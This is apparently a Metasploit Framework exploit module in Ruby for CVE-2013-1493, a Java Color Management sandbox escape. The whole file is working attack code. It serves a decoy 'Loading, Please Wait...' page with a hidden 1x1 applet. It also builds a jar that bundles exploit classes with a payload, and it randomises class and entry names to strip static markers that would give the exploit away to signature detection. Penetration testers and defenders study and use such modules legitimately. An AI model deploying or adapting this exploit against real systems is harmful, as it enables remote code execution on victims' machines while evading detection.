##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
require 'msf/core'
require 'rex'
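# Browser exploit for CVE-2013-1493 (Java CMM / Color Management classes).
#
# The module runs an HTTP server that hands out a landing page with a 1x1 <applet>
# tag and, on any "*.jar" request, a jar built from the module's Java payload plus
# four pre-compiled exploit classes shipped under data/exploits/cve-2013-1493.
# Class and entry names are randomised with same-length strings so the served
# archive carries no static "Init"/"metasploit"/"Payload" markers. Click-to-play is
# not bypassed: the victim must approve the applet.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The landing page is a bare <applet> tag; browser_autopwn needs no JavaScript
  # on the victim side to drive this module.
  autopwn_info({ :javascript => false })

  # Module metadata: name, references, payload constraints and targets.
  #
  # 'DefaultTarget' => 1 selects the native Windows x86 target (target 0 keeps the
  # payload in Java). 'Space' => 20480 bounds the payload embedded in the jar.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the pre-compiled applet classes shipped with the framework, randomises
  # the name of the entry-point class, then lets HttpServer#setup start the service
  # (the +super+ call must stay last so the class bytes are ready before serving).
  #
  # The class file is patched as raw bytes, so the random replacement for "Init"
  # must have exactly the same length: Java class files store constant-pool strings
  # with an explicit length prefix, and a different length would corrupt the class.
  # gsub! is case-sensitive and rewrites every "Init" in the file: the "<init>"
  # constructor name is untouched, but any other "Init" string would be renamed too.
  def setup
    @init_class           = read_exploit_class("Init.class")
    @leak_class           = read_exploit_class("Leak.class")
    @buffered_image_class = read_exploit_class("MyBufferedImage.class")
    @color_space_class    = read_exploit_class("MyColorSpace.class")

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Serves the exploit: any "*.jar" URI gets the applet archive, a URI ending in
  # "/" gets the landing page, anything else is redirected to the resource root.
  #
  # @param cli [Object] connected client socket
  # @param request [Object] parsed HTTP request (only +uri+ is read)
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Deliberately not named +payload+: a local of that name would shadow the
      # +payload+ method that build_jar relies on.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Landing page: a 1x1 applet whose archive name is random per request; the
  # "*.jar" branch of #on_request_uri answers whatever name was generated.
  # The applet still triggers the Java click-to-play prompt.
  #
  # @return [String] the HTML document
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html << %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html << %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html << %Q|</applet></body></html>|
    html
  end

  private

  # Builds the applet jar: the module's encoded Java payload plus the four exploit
  # classes, with the static "metasploit"/"Payload" strings in entry names and
  # entry bytes replaced by random strings of identical length (length must be
  # preserved for the same constant-pool reason described on #setup).
  #
  # @return [Object] the jar returned by +payload.encoded_jar+, ready to send
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file("Leak.class", @leak_class)
    jar.add_file("MyBufferedImage.class", @buffered_image_class)
    jar.add_file("MyColorSpace.class", @color_space_class)

    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str    = rand_text_alpha("payload".length)
    jar.entries.each do |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    end
    jar.build_manifest

    jar
  end

  # Reads one of the pre-compiled exploit classes from the framework data directory.
  # The path is built from the install root and a fixed file name, never from
  # client-supplied input.
  #
  # @param name [String] file name under data/exploits/cve-2013-1493
  # @return [String] raw class file bytes
  def read_exploit_class(name)
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", name)
    File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
  end
end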